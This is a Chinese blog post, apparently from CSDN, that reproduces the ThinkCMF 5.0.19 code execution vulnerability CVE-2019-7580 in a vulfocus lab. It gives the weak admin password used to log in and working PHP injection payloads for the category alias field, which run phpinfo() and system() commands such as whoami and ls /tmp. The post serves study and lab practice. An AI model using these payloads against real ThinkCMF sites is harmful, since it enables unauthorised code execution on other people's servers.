[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现 (CVE-2019-7580)phpinfo();ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH

已于 2022-03-16 11:23:45 修改
阅读量6.6k 收藏
点赞数 8
分类专栏: vulfocus漏洞复现 渗透笔记 漏洞复现 文章标签: swoole 安全 web安全 php linux
于 2022-03-16 11:13:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37092496/article/details/123521434
版权

前言

ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。
文章也会在这里同步

0x01进入后台

进入后台路径为:http://ip:port/admin

0x02我们这里使用弱口令登录

账户密码:admin:123456
在这里插入图片描述

0x03进入添加分类页面

依次进入
1、门户管理
2、分类管理
3、添加分类

分类名称随便填
分类别名输入poc:

1'=>array(""),phpinfo(),'2

描述随便填
描述随便填
在这里插入图片描述
添加后,点击勾,点击显示,出现如下页面
在这里插入图片描述

复现成功

获取flag命令:

1'=>array(""),system(‘ls /tmp’),'2

在这里插入图片描述

获取system()命令:

1'=>array(""),system(‘whoami’),'2
1'=>array(""),system(‘pwd’),'2

0x04 利用过程与分析

这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞.

将payload插入数据库,写入data/conf/route.php文件

程序的入口是index.php,在index.php中\think\App::run()执行应用。

在App.php的run()函数139行,执行sef::exec();

爬虫数据分析师
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
ThinkCMFX内容管理框架 v5.0.190111
10-04
ThinkCMF一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能
thinkphp v5.0.11漏洞_ThinkCMFX 漏洞分析集合
weixin_35890416的博客
12-10 679
ThinkCMF一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本...
ThinkCMF代码执行 (CVE-2019-7580)
m0_65150886的博客
02-21 231
ThinkCMF一款支持Swoole开源内容管理框架(CMF),基于ThinkPHP开发. ThinkCMF 5.0.19这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发代码执行漏洞。2.访问http://ip:port/admin,进入后台登录页面。1.访问http://ip:port,出现如下页面,开始实验。5.分类名称和描述随便填,分类别名输入poc,并点击添加。4.门户管理->分类管理->添加分类。6.勾选添加的分类,并点击显示。3.输入账号密码进行登录。
thinkcmf
You are happier than before
10-25 153
1.忘记后台密码
thinkphp 使用标签库的步骤
dcj3sjt126com的专栏
01-15 161
 应用实例:在 商务中心的  管理供求信息 页面:利用标签库生成列表;步骤一:在项目配置文件Conf文件夹下,新建一个taglibs.php文件,将return array('html'=> '@.TagLib.TagLibHtml' , // 使用import方法支持的路径格式);拷贝进去,这是定义本项目使用哪个标签库;步骤二:在Lib目录下,新建 TagLib 文件夹;Lib/Tag...
[漏洞分析]thinkcmf 1.6.0版本从sql注入到任意代码执行
weixin_30660027的博客
11-23 128
0x00 前言 该漏洞源于某真实案例,虽然攻击没有用到该漏洞,但在分析攻击之后对该版本的cmf审计之后发现了,也算是有点机遇巧合的味道,我没去找漏洞漏洞找上了我XD thinkcmf 已经非常久远了,该版本看github上的更新时间已经是4年前了,也就是2014年的时候,那时候我没学安全呢。。。 0x01 前台sql注入 前台在登录方法中存在注入,thinkcmf是基于t...
thinkcmf 代码执行CVE-2019-7580漏洞复现
YouthBelief的博客
05-10 2015
所有文章,仅供安全研究与学习之用,后果自负! thinkcmf 代码执行 CVE-2019-7580thinkcmf 代码执行CVE-2019-7580)0x01 漏洞描述0x02 影响范围0x03 漏洞复现3.1 登录后台3.2 漏洞利用3.2.1webshell3.2 phpinfo3.3 获取系统命令0x04 漏洞修复 thinkcmf 代码执行CVE-2019-7580复现小心会搞崩环境。 0x01 漏洞描述 ThinkCMF一款支持Swoole开源内容管理框架(CMF),基于Thi
thinkcmf-5.0.190111后台任意文件写入导致的代码执行CVE-2019-7580
公众号shadow sock7
02-11 4370
https://xz.aliyun.com/t/3997
ThinkCMF任意文件写入漏洞——漏洞复现
W小哥
06-22 2836
一、漏洞描述 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.3 二、漏洞原理 ThinkCMF一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 三、环境搭建 下载ThinkCMF X2.2.0 链接:https://pan.baidu
漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现
wwl012345的博客
11-29 2749
0x00 简介 ThinkCMF一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 0x01 漏洞介绍 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 0...
ThinkCMF框架上的任意内容包含漏洞复现+分析
weixin_44897902的博客
11-16 757
thinkcmf的任意内容包含漏洞
vue2 顶象 安全 验证码的使用
lele66688888的博客
04-23 310
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。
标准更新丨美国发布玩具安全标准ASTM F963-23
最新发布
yzc9311的博客
04-26 410
ASTM F963是根据美国联邦法规的强制性要求而制定,一般来说标准的内容充分包含了CPSC 16CFR的有关技术要求,制造商能确保产品符合ASTM F963的要求,也就基本满足了CPSC 16 CFR的有关技术要求,目前CPSC仍采用ASTM F963-17。新版标准主要修订了声响、电池可触及性、膨胀材料和弹射玩具的技术要求,另外,澄清和调整了邻苯二甲酸酯、玩具基材重金属的豁免以及溯源标签的要求,使其保持与联邦法规和美国消费品安全委员会(CPSC)的政策一致。调整了条款的次序,使其更加符合逻辑。
RTU遥测终端为城市排水安全保驾护航!
mantoo2014的博客
04-23 458
漫途多参数遥测终端MTW46-10-4A与低功耗遥测终端M4315,能够实时在线监测城市下水管道、涵洞、水浸点及河道的水位状况,同时精准采集水位、流量、流速和水质等数据。一旦监测到险情,平台会通过手机APP、短信通知以及现场声光报警器等多种方式,向城市管理者发出预警,从而有效预防和应对各类排水问题,确保城市排水系统的安全、稳定运行。漫途低功耗远程采集终端M4315是一款实现数据采集、远程传输、远程运维的智能设备,具有功耗低、体积小巧、盲区小、安装便捷等特点,适用于地下管网、雨水井等特殊环境的工业级设备。
CVE-2019-11477 漏洞复现教程
05-27
我很抱歉,由于 CVE-2019-11477 是一种漏洞,攻击该漏洞可能导致远程服务器拒绝服务或崩溃,因此我无法提供该漏洞复现教程或攻击代码。在任何情况下,攻击漏洞是违法行为,违反了信息安全法律法规,也会对网络安全造成严重威胁和损害。我们应该尊重他人的合法权益,遵守法律法规,远离黑客攻击等违法行为,共同维护网络安全。如果您需要更多关于该漏洞的信息,可以查阅相关的安全公告或 CVE 详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爬虫数据分析师

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值